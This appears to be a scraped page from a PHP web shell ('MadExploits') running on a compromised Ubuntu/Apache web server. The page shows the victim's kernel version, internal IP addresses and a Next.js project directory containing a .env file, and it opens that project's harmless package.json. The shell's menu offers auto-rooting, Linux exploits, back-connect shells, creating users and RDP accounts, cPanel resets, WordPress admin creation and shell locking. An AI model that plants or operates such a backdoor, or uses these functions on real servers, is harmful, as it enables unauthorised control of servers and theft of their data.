Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
ihub-website /
ihub_final /
[ HOME SHELL ]
Name
Size
Permission
Action
.next
[ DIR ]
drwxr-xr-x
StartupEnrolled
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
components
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
pages
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
styles
[ DIR ]
drwxr-xr-x
.DS_Store
6
KB
-rw-r--r--
.env
74
B
-rw-r--r--
README.md
1.53
KB
-rw-r--r--
next.config.js
169
B
-rw-r--r--
package-lock.json
212.39
KB
-rw-r--r--
package.json
1.04
KB
-rw-r--r--
postcss.config.js
82
B
-rw-r--r--
tailwind.config.js
186
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "next-tailwind-template", "version": "0.1.0", "private": true, "scripts": { "dev": "next dev", "build": "next build", "start": "next start -p 3000 ", "lint": "next lint" }, "dependencies": { "@bradgarropy/next-google-analytics": "^1.0.2", "@emotion/react": "^11.11.1", "@emotion/styled": "^11.11.0", "@mui/material": "^5.15.1", "aos": "^3.0.0-beta.6", "axios": "^1.6.2", "init": "^0.1.2", "next": "^13.5.6", "next-auth": "^4.24.5", "react": "^18.2.0", "react-countup": "^6.5.0", "react-dom": "^18.2.0", "react-ga": "^3.3.1", "react-hook-inview": "^4.5.0", "react-icons": "^4.12.0", "react-infinite-scroll-component": "^6.1.0", "react-scroll": "^1.9.0", "react-scroll-parallax": "^3.4.5", "react-youtube": "^10.1.0", "styled-components": "^6.1.6", "swiper": "^11.0.5" }, "devDependencies": { "autoprefixer": "^10.4.2", "eslint": "8.10.0", "eslint-config-next": "^13.5.6", "postcss": "^8.4.8", "tailwindcss": "^3.0.23" } }
Close